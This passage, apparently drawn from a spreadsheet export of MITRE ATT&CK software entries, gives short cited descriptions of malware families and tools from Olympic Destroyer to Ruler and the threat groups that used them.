    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) is a Trojan used by [OilRig](https://attack.mitre.org/groups/G0049) to remotely execute commands as well as upload/download files to/from victims. (Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two. [PLEAD](https://attack.mitre.org/software/S0435) was observed in use as early as March 2017.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018)</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014)</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)</t>
  </si>
  <si>
    <t>[PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>[PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)</t>
  </si>
  <si>
    <t>[RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)</t>
  </si>
  <si>
    <t>[ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)
Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)</t>
  </si>
  <si>
    <t>Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) between 2017 and 2019. [Rising Sun](https://attack.mitre.org/software/S0448) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://attack.mitre.org/software/S0448) included some source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)</t>
  </si>
  <si>
